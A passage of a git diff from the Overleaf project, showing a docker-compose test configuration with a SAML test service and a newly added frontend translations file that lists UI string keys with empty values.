max-open-files-limit as socket buffer scale). + # REF: https://github.com/moby/moby/issues/8231#issuecomment-63877553 + # REF: https://github.com/moby/moby/issues/8231#issuecomment-63871343 + command: + - 'bash' + - '-c' + - 'ulimit -n 1024 && exec bash /run.sh' + + saml: + image: us-east1-docker.pkg.dev/overleaf-ops/ol-docker/saml-test + environment: + SAML_BASE_URL_PATH: 'http://saml/simplesaml/' + SAML_TEST_SP_ENTITY_ID: 'overleaf-test-saml' + SAML_TEST_SP_LOCATION: 'http://www.overleaf.test:23000/saml/callback' diff --git a/services/web/frontend/extracted-translations.json b/services/web/frontend/extracted-translations.json new file mode 100644 index 0000000..c11e77c --- /dev/null +++ b/services/web/frontend/extracted-translations.json @@ -0,0 +1,2176 @@ +{ + "12x_more_compile_time": "", + "1_2_width": "", + "1_4_width": "", + "3_4_width": "", + "About": "", + "Account": "", + "Account Settings": "", + "Documentation": "", + "Get Involved": "", + "Help": "", + "Learn": "", + "Plans and Pricing": "", + "a_custom_size_has_been_used_in_the_latex_code": "", + "a_fatal_compile_error_that_completely_blocks_compilation": "", + "a_file_with_that_name_already_exists_and_will_be_overriden": "", + "a_more_comprehensive_list_of_keyboard_shortcuts": "", + "a_new_reference_was_added": "", + "a_new_reference_was_added_from_provider": "", + "a_new_reference_was_added_to_file": "", + "a_new_reference_was_added_to_file_from_provider": "", + "about_error_assist": "", + "about_to_archive_projects": "", + "about_to_delete_cert": "", + "about_to_delete_projects": "", + "about_to_delete_tag": "", + "about_to_delete_the_following_project": "", + "about_to_delete_the_following_projects": "", + "about_to_delete_user_preamble": "", + "about_to_enable_managed_users": "", + "about_to_leave_project": "", + "about_to_leave_projects": "", + "about_to_trash_projects": "", + "about_writefull": "", + "accept_and_continue": "", + "accept_change": "", + "accept_change_error_description": "", + "accept_change_error_title": "", + "accept_invitation": "", + "accept_or_reject_each_changes_individually": "", + "accept_or_reject_individual_edits": "", + "accept_selected_changes": "", + "accept_terms_and_conditions": "", + "accepted_invite": "", + "access_all_premium_features": "", + "access_denied": "", + "access_edit_your_projects": "", + "access_levels_changed": "", + "access_your_favourite_features_faster_with_our_new_streamlined_editor": "", + "account_billed_manually": "", + "account_has_been_link_to_institution_account": "", + "account_has_past_due_invoice_change_plan_warning": "", + "account_managed_by_group_administrator": "", + "account_not_linked_to_dropbox": "", + "account_settings": "", + "acct_linked_to_institution_acct_2": "", + "actions": "", + "active": "", + "add": "", + "add_a_recovery_email_address": "", + "add_add_on_to_your_plan": "", + "add_additional_certificate": "", + "add_affiliation": "", + "add_ai_assist": "", + "add_another_address_line": "", + "add_another_email": "", + "add_another_token": "", + "add_comma_separated_emails_help": "", + "add_comment": "", + "add_comment_error_message": "", + "add_comment_error_title": "", + "add_company_details": "", + "add_email_address": "", + "add_email_to_claim_features": "", + "add_error_assist_annual_to_your_projects": "", + "add_error_assist_to_your_projects": "", + "add_files": "", + "add_more_collaborators": "", + "add_more_licenses_to_my_plan": "", + "add_more_managers": "", + "add_new_email": "", + "add_on": "", + "add_ons": "", + "add_or_remove_project_from_tag": "", + "add_overleaf_assist_to_your_group_subscription": "", + "add_overleaf_assist_to_your_institution": "", + "add_people": "", + "add_role_and_department": "", + "add_to_dictionary": "", + "add_to_tag": "", + "add_unlimited_ai_to_your_overleaf_plan": "", + "add_your_comment_here": "", + "add_your_first_group_member_now": "", + "added_by_on": "", + "adding": "", + "additional_certificate": "", + "additional_licenses": "", + "address_line_1": "", + "address_second_line_optional": "", + "adjust_column_width": "", + "advanced_reference_search_mode": "", + "after_that_well_bill_you_x_total_y_subtotal_z_tax_annually_on_date_unless_you_cancel": "", + "aggregate_changed": "", + "aggregate_to": "", + "agree_with_the_terms": "", + "ai_assist_in_overleaf_is_included_via_writefull": "", + "ai_assistance_to_help_you": "", + "ai_based_language_tools": "", + "ai_can_make_mistakes": "", + "ai_features": "", + "ai_feedback_please_provide_more_detail": "", + "ai_feedback_tell_us_what_was_wrong_so_we_can_improve": "", + "ai_feedback_the_answer_was_too_long": "", + "ai_feedback_the_answer_wasnt_detailed_enough": "", + "ai_feedback_the_suggestion_didnt_fix_the_error": "", + "ai_feedback_the_suggestion_wasnt_the_best_fix_available": "", + "ai_feedback_there_was_no_code_fix_suggested": "", + "alignment": "", + "all_borders": "", + "all_features_in_group_standard_plus": "", + "all_premium_features": "", + "all_premium_features_including": "", + "all_projects": "", + "all_projects_will_be_transferred_immediately": "", + "all_these_experiments_are_available_exclusively": "", + "allows_to_search_by_author_title_etc_possible_to_pull_results_directly_from_your_reference_manager_if_connected": "", + "already_have_a_papers_account": "", + "already_subscribed_try_refreshing_the_page": "", + "an_email_has_already_been_sent_to": "", + "an_error_occured_while_restoring_project": "", + "an_error_occurred_when_verifying_the_coupon_code": "", + "annual_discount": "", + "anonymous": "", + "anyone_with_link_can_edit": "", + "anyone_with_link_can_view": "", + "app_on_x": "", + "appearance": "", + "apply_educational_discount_description_with_group_discount": "", + "apply_suggestion": "", + "archive": "", + "archive_projects": "", + "archived": "", + "archived_projects": "", + "archiving_projects_wont_affect_collaborators": "", + "are_you_affiliated_with_an_institution": "", + "are_you_getting_an_undefined_control_sequence_error": "", + "are_you_still_at": "", + "are_you_sure_you_want_to_cancel_add_on": "", + "as_email": "", + "ask_proj_owner_to_unlink_from_current_github": "", + "ask_proj_owner_to_upgrade_for_full_history": "", + "ask_proj_owner_to_upgrade_for_references_search": "", + "ask_repo_owner_to_reconnect": "", + "ask_repo_owner_to_renew_overleaf_subscription": "", + "at_most_x_libraries_can_be_selected": "", + "auto_close_brackets": "", + "auto_compile": "", + "auto_complete": "", + "autocompile": "", + "autocompile_disabled": "", + "autocompile_disabled_reason": "", + "autocomplete": "", + "autocomplete_references": "", + "automatically_insert_closing_brackets_and_parentheses": "", + "automatically_recompile_the_project_as_you_edit": "", + "available_with_group_professional": "", + "back": "", + "back_to_configuration": "", + "back_to_editor": "", + "back_to_subscription": "", + "back_to_your_projects": "", + "basic_compile_time": "", + "become_an_advisor": "", + "before_you_use_error_assistant": "", + "beta_program_already_participating": "", + "beta_program_benefits": "", + "beta_program_not_participating": "", + "billed_annually_at": "", + "billed_monthly_at": "", + "billed_yearly": "", + "billing": "", + "binary_history_error": "", + "blank_project": "", + "blocked_filename": "", + "blog": "", + "bold": "", + "browser": "", + "bullet_list": "", + "buy_licenses": "", + "buy_more_licenses": "", + "by_subscribing_you_agree_to_our_terms_of_service": "", + "can_edit_content": "", + "can_link_institution_email_acct_to_institution_acct": "", + "can_link_your_institution_acct_2": "", + "can_now_relink_dropbox": "", + "can_view_content": "", + "cancel": "", + "cancel_add_on": "", + "cancel_anytime": "", + "cancel_my_account": "", + "cancel_my_subscription": "", + "cancel_personal_subscription_first": "", + "cancel_subscription": "", + "cancel_your_subscription": "", + "cannot_invite_non_user": "", + "cannot_invite_self": "", + "cannot_verify_user_not_robot": "", + "cant_see_what_youre_looking_for_question": "", + "caption_above": "", + "caption_below": "", + "card_details": "", + "card_details_are_not_valid": "", + "card_must_be_authenticated_by_3dsecure": "", + "card_payment": "", + "careers": "", + "category_arrows": "", + "category_greek": "", + "category_misc": "", + "category_operators": "", + "category_relations": "", + "center": "", + "change": "", + "change_currency": "", + "change_language": "", + "change_or_cancel-cancel": "", + "change_or_cancel-change": "", + "change_or_cancel-or": "", + "change_owner": "", + "change_password": "", + "change_password_in_account_settings": "", + "change_plan": "", + "change_primary_email": "", + "change_primary_email_address_instructions": "", + "change_project_owner": "", + "change_the_ownership_of_your_personal_projects": "", + "change_to_group_plan": "", + "change_to_this_plan": "", + "changing_the_position_of_your_figure": "", + "changing_the_position_of_your_table": "", + "chat": "", + "chat_error": "", + "check_logs": "", + "checking_dropbox_status": "", + "checking_project_github_status": "", + "choose_a_custom_color": "", + "choose_from_group_members": "", + "choose_how_you_search_your_references": "", + "choose_which_experiments": "", + "citation": "", + "clear_cached_files": "", + "clear_search": "", + "click_here_to_view_sl_in_lng": "", + "click_to_give_feedback": "", + "click_to_unpause": "", + "clicking_delete_will_remove_sso_config_and_clear_saml_data": "", + "clone_with_git": "", + "close": "", + "clsi_maintenance": "", + "clsi_unavailable": "", + "code_check_failed": "", + "code_check_failed_explanation": "", + "code_editor": "", + "collaborate_online_and_offline": "", + "collaborator_chat": "", + "collabs_per_proj": "", + "collabs_per_proj_single": "", + "collapse": "", + "column_width": "", + "column_width_is_custom_click_to_resize": "", + "column_width_is_x_click_to_resize": "", + "comment": "", + "comment_only": "", + "comment_only_upgrade_for_track_changes": "", + "comment_only_upgrade_to_enable_track_changes": "", + "common": "", + "common_causes_of_compile_timeouts_include": "", + "commons_plan_tooltip": "", + "compact": "", + "company_name": "", + "compare": "", + "compare_all_plans": "", + "comparing_from_x_to_y": "", + "compile_error_entry_description": "", + "compile_error_handling": "", + "compile_larger_projects": "", + "compile_mode": "", + "compile_terminated_by_user": "", + "compiler": "", + "compiling": "", + "compliance": "", + "compromised_password": "", + "configure_sso": "", + "confirm": "", + "confirm_accept_selected_changes": "", + "confirm_accept_selected_changes_plural": "", + "confirm_affiliation": "", + "confirm_affiliation_to_relink_dropbox": "", + "confirm_delete_user_type_email_address": "", + "confirm_new_password": "", + "confirm_primary_email_change": "", + "confirm_reject_selected_changes": "", + "confirm_reject_selected_changes_plural": "", + "confirm_remove_sso_config_enter_email": "", + "confirm_secondary_email": "", + "confirm_your_email": "", + "confirming": "", + "conflicting_paths_found": "", + "congratulations_youve_successfully_join_group": "", + "connect_overleaf_with_github": "", + "connected_users": "", + "connection_lost_with_unsaved_changes": "", + "contact_group_admin": "", + "contact_sales": "", + "contact_support_to_change_group_subscription": "", + "contact_us": "", + "contacting_the_sales_team": "", + "continue": "", + "continue_github_merge": "", + "continue_to": "", + "continue_using_free_features": "", + "continue_with_free_plan": "", + "copied": "", + "copy": "", + "copy_code": "", + "copy_project": "", + "copy_response": "", + "copying": "", + "cost_summary": "", + "country": "", + "country_flag": "", + "coupon_code": "", + "coupon_code_is_not_valid_for_selected_plan": "", + "coupons_not_included": "", + "create": "", + "create_a_new_project": "", + "create_new_subscription": "", + "create_new_tag": "", + "create_project_in_github": "", + "created": "", + "created_at": "", + "cross_reference": "", + "current_file": "", + "current_password": "", + "currently_seeing_only_24_hrs_history": "", + "currently_signed_in_as_x": "", + "currently_subscribed_to_plan": "", + "custom": "", + "custom_borders": "", + "customize_your_group_subscription": "", + "customizing_figures": "", + "customizing_tables": "", + "date_and_owner": "", + "dealing_with_errors": "", + "decrease_indent": "", + "delete": "", + "delete_account": "", + "delete_account_confirmation_label": "", + "delete_account_warning_message_3": "", + "delete_acct_no_existing_pw": "", + "delete_and_leave": "", + "delete_and_leave_projects": "", + "delete_authentication_token": "", + "delete_authentication_token_info": "", + "delete_certificate": "", + "delete_comment": "", + "delete_comment_error_message": "", + "delete_comment_error_title": "", + "delete_comment_message": "", + "delete_comment_thread": "", + "delete_comment_thread_message": "", + "delete_figure": "", + "delete_projects": "", + "delete_row_or_column": "", + "delete_sso_config": "", + "delete_table": "", + "delete_tag": "", + "delete_token": "", + "delete_user": "", + "delete_your_account": "", + "deleted_at": "", + "deleted_by_email": "", + "deleted_by_id": "", + "deleted_by_ip": "", + "deleted_by_on": "", + "deleting": "", + "demonstrating_git_integration": "", + "demonstrating_track_changes_feature": "", + "department": "", + "description": "", + "details_provided_by_google_explanation": "", + "dictionary": "", + "did_you_know_institution_providing_professional": "", + "disable": "", + "disable_ai_features": "", + "disable_equation_preview": "", + "disable_equation_preview_confirm": "", + "disable_equation_preview_enable": "", + "disable_single_sign_on": "", + "disable_sso": "", + "disable_stop_on_first_error": "", + "disabled": "", + "disabling": "", + "disconnected": "", + "discount": "", + "discount_of": "", + "discover_the_fastest_way_to_search_and_cite": "", + "dismiss_error_popup": "", + "display": "", + "display_deleted_user": "", + "display_math": "", + "do_you_need_edit_access": "", + "do_you_want_to_change_your_primary_email_address_to": "", + "do_you_want_to_overwrite_it": "", + "do_you_want_to_overwrite_it_plural": "", + "do_you_want_to_overwrite_them": "", + "document_too_long": "", + "document_too_long_detail": "", + "document_too_long_tracked_deletes": "", + "document_updated_externally": "", + "document_updated_externally_detail": "", + "documentation": "", + "doesnt_match": "", + "doing_this_allow_log_in_through_institution": "", + "doing_this_allow_log_in_through_institution_2": "", + "doing_this_will_verify_affiliation_and_allow_log_in_2": "", + "done": "", + "dont_forget_you_currently_have": "", + "dont_reload_or_close_this_tab": "", + "download": "", + "download_all": "", + "download_as_pdf": "", + "download_as_source_zip": "", + "download_metadata": "", + "download_pdf": "", + "download_zip_file": "", + "draft_sso_configuration": "", + "drag_here": "", + "drag_here_paste_an_image_or": "", + "dropbox": "", + "dropbox_checking_sync_status": "", + "dropbox_duplicate_project_names": "", + "dropbox_duplicate_project_names_suggestion": "", + "dropbox_for_link_share_projs": "", + "dropbox_integration_lowercase": "", + "dropbox_sync": "", + "dropbox_sync_both": "", + "dropbox_sync_description": "", + "dropbox_sync_error": "", + "dropbox_sync_in": "", + "dropbox_sync_now_rate_limited": "", + "dropbox_sync_now_running": "", + "dropbox_sync_out": "", + "dropbox_sync_troubleshoot": "", + "dropbox_synced": "", + "dropbox_unlinked_premium_feature": "", + "due_date": "", + "due_today": "", + "duplicate_file": "", + "duplicate_projects": "", + "each_user_will_have_access_to": "", + "easily_manage_your_project_files_everywhere": "", + "edit": "", + "edit_comment_error_message": "", + "edit_comment_error_title": "", + "edit_dictionary": "", + "edit_dictionary_empty": "", + "edit_dictionary_remove": "", + "edit_figure": "", + "edit_sso_configuration": "", + "edit_tag": "", + "edit_your_custom_dictionary": "", + "editing": "", + "editing_captions": "", + "editing_tools": "", + "editor": "", + "editor_and_pdf": "", + "editor_disconected_click_to_reconnect": "", + "editor_font_family": "", + "editor_font_size": "", + "editor_limit_exceeded_in_this_project": "", + "editor_line_height": "", + "editor_only": "", + "editor_only_hide_pdf": "", + "editor_theme": "", + "edits_become_suggestions": "", + "educational_disclaimer": "", + "educational_disclaimer_heading": "", + "educational_percent_discount_applied": "", + "email": "", + "email_address": "", + "email_address_is_invalid": "", + "email_already_registered": "", + "email_confirmed_onboarding": "", + "email_confirmed_onboarding_message": "", + "email_limit_reached": "", + "email_link_expired": "", + "email_must_be_linked_to_institution": "", + "email_or_password_wrong_try_again": "", + "email_remove_by_date": "", + "emails_and_affiliations_explanation": "", + "emails_and_affiliations_title": "", + "empty": "", + "enable_ai_features": "", + "enable_managed_users": "", + "enable_single_sign_on": "", + "enable_sso": "", + "enable_stop_on_first_error_under_recompile_dropdown_menu": "", + "enable_stop_on_first_error_under_recompile_dropdown_menu_v2": "", + "enabled": "", + "enables_real_time_syntax_checking_in_the_editor": "", + "enabling": "", + "end_of_document": "", + "ensure_recover_account": "", + "enter_6_digit_code": "", + "enter_any_size_including_units_or_valid_latex_command": "", + "enter_image_url": "", + "enter_the_code": "", + "enter_the_confirmation_code": "", + "enter_the_number_of_licenses_youd_like_to_add_to_see_the_cost_breakdown": "", + "equation_generator": "", + "equation_preview": "", + "error": "", + "error_assist": "", + "error_log": "", + "error_opening_document": "", + "error_opening_document_detail": "", + "error_performing_request": "", + "error_processing_file": "", + "example_project": "", + "existing_plan_active_until_term_end": "", + "expand": "", + "experiment_full": "", + "expired": "", + "expired_confirmation_code": "", + "expires": "", + "expires_in_days": "", + "expires_on": "", + "export_csv": "", + "export_project_to_github": "", + "failed_to_send_group_invite_to_email": "", + "failed_to_send_managed_user_invite_to_email": "", + "failed_to_send_sso_link_invite_to_email": "", + "fair_usage_policy_applies": "", + "fast": "", + "fast_draft": "", + "features_like_track_changes": "", + "figure": "", + "file": "", + "file_action_created": "", + "file_action_deleted": "", + "file_action_edited": "", + "file_action_renamed": "", + "file_action_restored": "", + "file_action_restored_project": "", + "file_already_exists": "", + "file_already_exists_in_this_location": "", + "file_name": "", + "file_name_figure_modal": "", + "file_name_in_this_project": "", + "file_name_in_this_project_figure_modal": "", + "file_or_folder_name_already_exists": "", + "file_outline": "", + "file_size": "", + "file_tree": "", + "files_cannot_include_invalid_characters": "", + "files_selected": "", + "filter_projects": "", + "find": "", + "find_out_more": "", + "find_out_more_about_institution_login": "", + "find_out_more_about_the_file_outline": "", + "find_out_more_nt": "", + "finding_a_fix": "", + "first_name": "", + "fit_to_height": "", + "fit_to_width": "", + "fixed_width": "", + "fixed_width_wrap_text": "", + "fold_line": "", + "folder_location": "", + "following_paths_conflict": "", + "font_family": "", + "font_size": "", + "footer_about_us": "", + "footer_contact_us": "", + "footer_navigation": "", + "for_enterprise": "", + "for_government": "", + "for_individuals_and_groups": "", + "for_more_information_see_managed_accounts_section": "", + "for_students": "", + "for_universities": "", + "format": "", + "found_matching_deleted_users": "", + "free": "", + "free_7_day_trial_billed_annually": "", + "free_7_day_trial_billed_monthly": "", + "free_plan_label": "", + "free_plan_tooltip": "", + "from_another_project": "", + "from_enforcement_date": "", + "from_external_url": "", + "from_filename": "", + "from_github": "", + "from_project_files": "", + "from_provider": "", + "from_url": "", + "full_doc_history": "", + "full_width": "", + "future_payments": "", + "generate_from_text_or_image": "", + "generate_token": "", + "generic_if_problem_continues_contact_us": "", + "generic_linked_file_compile_error": "", + "generic_something_went_wrong": "", + "get_collaborative_benefits": "", + "get_discounted_plan": "", + "get_error_assist": "", + "get_exclusive_access_to_labs": "", + "get_in_touch": "", + "get_most_subscription_discover_premium_features": "", + "get_real_time_track_changes": "", + "git": "", + "git_authentication_token": "", + "git_authentication_token_create_modal_info_1": "", + "git_authentication_token_create_modal_info_2": "", + "git_bridge_modal_click_generate": "", + "git_bridge_modal_enter_authentication_token": "", + "git_bridge_modal_git_clone_your_project": "", + "git_bridge_modal_learn_more_about_authentication_tokens": "", + "git_bridge_modal_read_only": "", + "git_bridge_modal_review_access": "", + "git_bridge_modal_see_once": "", + "git_bridge_modal_use_previous_token": "", + "git_integration": "", + "git_integration_info": "", + "github": "", + "github_commit_message_placeholder": "", + "github_credentials_expired": "", + "github_empty_repository_error": "", + "github_file_name_error": "", + "github_file_sync_error": "", + "github_git_folder_error": "", + "github_integration_lowercase": "", + "github_is_no_longer_connected": "", + "github_is_premium": "", + "github_large_files_error": "", + "github_merge_failed": "", + "github_no_master_branch_error": "", + "github_private_description": "", + "github_public_description": "", + "github_repository_diverged": "", + "github_symlink_error": "", + "github_sync": "", + "github_sync_description": "", + "github_sync_error": "", + "github_sync_repository_not_found_description": "", + "github_timeout_error": "", + "github_too_many_files_error": "", + "github_validation_check": "", + "github_workflow_authorize": "", + "github_workflow_files_delete_github_repo": "", + "github_workflow_files_error": "", + "give_feedback": "", + "give_your_feedback": "", + "go_next_page": "", + "go_page": "", + "go_prev_page": "", + "go_to_code_location_in_pdf": "", + "go_to_overleaf": "", + "go_to_pdf_location_in_code": "", + "go_to_settings": "", + "go_to_subscriptions": "", + "go_to_writefull": "", + "good_news_you_already_purchased_this_add_on": "", + "good_news_you_are_already_receiving_this_add_on_via_writefull": "", + "group_admin": "", + "group_invitations": "", + "group_invite_has_been_sent_to_email": "", + "group_libraries": "", + "group_managed_by_group_administrator": "", + "group_management": "", + "group_managers": "", + "group_members": "", + "group_plan_tooltip": "", + "group_plan_upgrade_description": "", + "group_plan_with_name_tooltip": "", + "group_settings": "", + "group_sso_configuration_idp_metadata": "", + "group_sso_configure_service_provider_in_idp": "", + "group_sso_documentation_links": "", + "group_subscription": "", + "have_an_extra_backup": "", + "have_more_days_to_try": "", + "headers": "", + "help": "", + "help_articles_matching": "", + "help_improve_overleaf_fill_out_this_survey": "", + "help_improve_screen_reader_fill_out_this_survey": "", + "help_shape_the_future_of_overleaf": "", + "hide": "", + "hide_configuration": "", + "hide_deleted_user": "", + "hide_document_preamble": "", + "hide_file_tree": "", + "hide_local_file_contents": "", + "hide_outline": "", + "history": "", + "history_add_label": "", + "history_are_you_sure_delete_label": "", + "history_compare_from_this_version": "", + "history_compare_up_to_this_version": "", + "history_delete_label": "", + "history_download_this_version": "", + "history_entry_origin_dropbox": "", + "history_entry_origin_git": "", + "history_entry_origin_github": "", + "history_entry_origin_upload": "", + "history_label_created_by": "", + "history_label_project_current_state": "", + "history_label_this_version": "", + "history_new_label_name": "", + "history_restore_promo_content": "", + "history_restore_promo_title": "", + "history_resync": "", + "history_view_a11y_description": "", + "history_view_all": "", + "history_view_labels": "", + "home": "", + "hotkey_add_a_comment": "", + "hotkey_autocomplete_menu": "", + "hotkey_beginning_of_document": "", + "hotkey_bold_text": "", + "hotkey_compile": "", + "hotkey_delete_current_line": "", + "hotkey_end_of_document": "", + "hotkey_find_and_replace": "", + "hotkey_go_to_line": "", + "hotkey_indent_selection": "", + "hotkey_insert_candidate": "", + "hotkey_italic_text": "", + "hotkey_redo": "", + "hotkey_search_references": "", + "hotkey_select_all": "", + "hotkey_select_candidate": "", + "hotkey_to_lowercase": "", + "hotkey_to_uppercase": "", + "hotkey_toggle_comment": "", + "hotkey_toggle_review_panel": "", + "hotkey_toggle_track_changes": "", + "hotkey_undo": "", + "hotkeys": "", + "how_it_works": "", + "how_many_licenses_do_you_want_to_buy": "", + "how_to_create_tables": "", + "how_to_insert_images": "", + "how_we_use_your_data": "", + "how_we_use_your_data_explanation": "", + "i_confirm_am_student": "", + "i_want_to_stay": "", + "id": "", + "identify_errors_with_your_compile": "", + "if_you_need_to_customize_your_table_further_you_can": "", + "if_you_want_more_than_x_licenses_on_your_plan_we_need_to_add_them_for_you": "", + "if_you_want_to_reduce_the_number_of_licenses_please_contact_support": "", + "if_your_occupation_not_listed_type_full_name": "", + "ignore_validation_errors": "", + "ill_take_it": "", + "image_file": "", + "image_url": "", + "image_width": "", + "import_a_bibtex_file_from_your_provider_account": "", + "import_existing_projects_from_github": "", + "import_from_github": "", + "import_idp_metadata": "", + "import_to_sharelatex": "", + "imported_from_another_project_at_date": "", + "imported_from_external_provider_at_date": "", + "imported_from_mendeley_at_date": "", + "imported_from_papers_at_date": "", + "imported_from_the_output_of_another_project_at_date": "", + "imported_from_zotero_at_date": "", + "importing": "", + "importing_and_merging_changes_in_github": "", + "improved_dark_mode": "", + "in_order_to_match_institutional_metadata_2": "", + "in_order_to_match_institutional_metadata_associated": "", + "include_caption": "", + "include_label": "", + "include_results_from_your_reference_manager": "", + "include_results_from_your_x_account": "", + "include_the_error_message_and_ai_response": "", + "included_as_part_of_your_writefull_subscription": "", + "increase_indent": "", + "increased_compile_timeout": "", + "inline": "", + "inline_math": "", + "inr_discount_modal_info": "", + "inr_discount_modal_title": "", + "insert": "", + "insert_column_left": "", + "insert_column_right": "", + "insert_figure": "", + "insert_from_another_project": "", + "insert_from_project_files": "", + "insert_from_url": "", + "insert_image": "", + "insert_row_above": "", + "insert_row_below": "", + "insert_x_columns_left": "", + "insert_x_columns_right": "", + "insert_x_rows_above": "", + "insert_x_rows_below": "", + "institution": "", + "institution_account": "", + "institution_acct_successfully_linked_2": "", + "institution_and_role": "", + "institution_has_overleaf_subscription": "", + "institution_templates": "", + "institutional_leavers_survey_notification": "", + "integrate_overleaf_with_dropbox": "", + "integrations": "", + "integrations_like_github": "", + "interested_in_cheaper_personal_plan": "", + "invalid_confirmation_code": "", + "invalid_email": "", + "invalid_file_name": "", + "invalid_filename": "", + "invalid_password_contains_email": "", + "invalid_password_too_similar": "", + "invalid_regular_expression": "", + "invalid_request": "", + "invite": "", + "invite_expired": "", + "invite_more_collabs": "", + "invite_more_members": "", + "invite_not_accepted": "", + "invite_resend_limit_hit": "", + "invited_to_group": "", + "invited_to_group_have_individual_subcription": "", + "inviting": "", + "ip_address": "", + "is_email_affiliated": "", + "issued_on": "", + "it_looks_like_that_didnt_work_you_can_try_again_or_get_in_touch": "", + "it_looks_like_your_account_is_billed_manually": "", + "it_looks_like_your_payment_details_are_missing_please_update_your_billing_information": "", + "italics": "", + "join_beta_program": "", + "join_now": "", + "join_overleaf_labs": "", + "join_project": "", + "join_team_explanation": "", + "joined_team": "", + "joining": "", + "justify": "", + "kb_suggestions_enquiry": "", + "keep_current_plan": "", + "keep_personal_projects_separate": "", + "keep_your_account_safe_add_another_email": "", + "keybindings": "", + "keyboard_shortcuts": "", + "knowledge_base": "", + "labels_help_you_to_easily_reference_your_figures": "", + "labels_help_you_to_reference_your_tables": "", + "labs": "", + "language": "", + "language_suggestions": "", + "large_or_high-resolution_images_taking_too_long": "", + "large_or_high_resolution_images_taking_too_long_to_process": "", + "last_active": "", + "last_active_description": "", + "last_edit": "", + "last_logged_in": "", + "last_modified": "", + "last_name": "", + "last_resort_trouble_shooting_guide": "", + "last_suggested_fix": "", + "last_updated_date_by_x": "", + "last_used": "", + "latam_discount_modal_info": "", + "latam_discount_modal_title": "", + "latex_in_thirty_minutes": "", + "latex_places_figures_according_to_a_special_algorithm": "", + "latex_places_tables_according_to_a_special_algorithm": "", + "layout": "", + "layout_options": "", + "layout_processing": "", + "learn_more": "", + "learn_more_about_account": "", + "learn_more_about_compile_timeouts": "", + "learn_more_about_link_sharing": "", + "learn_more_about_managed_users": "", + "learn_more_about_other_causes_of_compile_timeouts": "", + "leave": "", + "leave_any_group_subscriptions": "", + "leave_group": "", + "leave_now": "", + "leave_project": "", + "leave_projects": "", + "left": "", + "length_unit": "", + "let_us_know": "", + "let_us_know_how_we_can_help": "", + "let_us_know_what_you_think": "", + "lets_get_those_premium_features": "", + "library": "", + "licenses": "", + "limited_document_history": "", + "limited_offer": "", + "limited_to_n_collaborators_per_project": "", + "limited_to_n_collaborators_per_project_plural": "", + "limited_to_n_editors": "", + "limited_to_n_editors_per_project": "", + "limited_to_n_editors_per_project_plural": "", + "limited_to_n_editors_plural": "", + "line": "", + "line_height": "", + "line_width_is_the_width_of_the_line_in_the_current_environment": "", + "link": "", + "link_account": "", + "link_accounts": "", + "link_accounts_and_add_email": "", + "link_institutional_email_get_started": "", + "link_overleaf_with_git": "", + "link_sharing": "", + "link_sharing_is_off_short": "", + "link_sharing_is_on": "", + "link_to_github": "", + "link_to_github_description": "", + "link_to_mendeley": "", + "link_to_papers": "", + "link_to_zotero": "", + "linked_accounts": "", + "linked_accounts_explained": "", + "linked_collabratec_description": "", + "linked_file": "", + "loading": "", + "loading_github_repositories": "", + "loading_prices": "", + "loading_recent_github_commits": "", + "loading_writefull": "", + "log_entry_description": "", + "log_entry_maximum_entries": "", + "log_entry_maximum_entries_enable_stop_on_first_error": "", + "log_entry_maximum_entries_see_full_logs": "", + "log_entry_maximum_entries_title": "", + "log_hint_extra_info": "", + "log_in": "", + "log_in_with_primary_email_address": "", + "log_out": "", + "log_out_lowercase_dot": "", + "log_viewer_error": "", + "logging_in_or_managing_your_account": "", + "login_count": "", + "login_to_accept_invitation": "", + "login_with_service": "", + "logs_and_output_files": "", + "looking_multiple_licenses": "", + "looks_like_youre_at": "", + "lost_connection": "", + "main_bibliography_file_for_this_project": "", + "main_document": "", + "main_file_not_found": "", + "main_navigation": "", + "make_a_copy": "", + "make_email_primary_description": "", + "make_owner": "", + "make_primary": "", + "make_private": "", + "manage_beta_program_membership": "", + "manage_files_from_your_dropbox_folder": "", + "manage_group_members_subtext": "", + "manage_group_settings": "", + "manage_group_settings_subtext": "", + "manage_group_settings_subtext_group_sso": "", + "manage_group_settings_subtext_managed_users": "", + "manage_institution_managers": "", + "manage_managers_subtext": "", + "manage_newsletter": "", + "manage_publisher_managers": "", + "manage_sessions": "", + "manage_subscription": "", + "manage_your_ai_assist_add_on": "", + "managed": "", + "managed_user_accounts": "", + "managed_user_invite_has_been_sent_to_email": "", + "managed_users": "", + "managed_users_explanation": "", + "managed_users_is_enabled": "", + "managed_users_terms": "", + "managers_management": "", + "managing_your_subscription": "", + "marked_as_resolved": "", + "math": "", + "math_display": "", + "math_inline": "", + "maximum_files_uploaded_together": "", + "maybe_later": "", + "members_management": "", + "mendeley_dynamic_sync_description": "", + "mendeley_groups_loading_error": "", + "mendeley_groups_relink": "", + "mendeley_integration": "", + "mendeley_is_premium": "", + "mendeley_reference_loading_error": "", + "mendeley_reference_loading_error_expired": "", + "mendeley_reference_loading_error_forbidden": "", + "mendeley_sync_description": "", + "mendeley_upgrade_prompt_content": "", + "mendeley_upgrade_prompt_title": "", + "menu": "", + "merge_cells": "", + "message_received": "", + "missing_field_for_entry": "", + "missing_fields_for_entry": "", + "missing_payment_details": "", + "money_back_guarantee": "", + "month": "", + "month_plural": "", + "more": "", + "more_actions": "", + "more_changes_based_on_your_feedback": "", + "more_collabs_per_project": "", + "more_comments": "", + "more_compile_time": "", + "more_info": "", + "more_options": "", + "more_options_for_border_settings_coming_soon": "", + "my_library": "", + "n_items": "", + "n_items_plural": "", + "n_more_updates_above": "", + "n_more_updates_above_plural": "", + "n_more_updates_below": "", + "n_more_updates_below_plural": "", + "name": "", + "name_usage_explanation": "", + "navigate_log_source": "", + "navigation": "", + "need_anything_contact_us_at": "", + "need_contact_group_admin_to_make_changes": "", + "need_make_changes": "", + "need_more_than_x_licenses": "", + "need_to_add_new_primary_before_remove": "", + "need_to_leave": "", + "new_compile_domain_notice": "", + "new_file": "", + "new_folder": "", + "new_font_open_dyslexic": "", + "new_look_and_feel": "", + "new_look_and_placement_of_the_settings": "", + "new_name": "", + "new_navigation_introducing_left_hand_side_rail_and_top_menus": "", + "new_overleaf_editor": "", + "new_password": "", + "new_project": "", + "new_subscription_will_be_billed_immediately": "", + "new_tag": "", + "new_tag_name": "", + "newsletter": "", + "newsletter_onboarding_accept": "", + "next": "", + "next_page": "", + "next_payment_of_x_collectected_on_y": "", + "no_actions": "", + "no_borders": "", + "no_caption": "", + "no_comments_or_suggestions": "", + "no_existing_password": "", + "no_folder": "", + "no_image_files_found": "", + "no_libraries_selected": "", + "no_members": "", + "no_messages": "", + "no_messages_yet": "", + "no_new_commits_in_github": "", + "no_one_has_commented_or_left_any_suggestions_yet": "", + 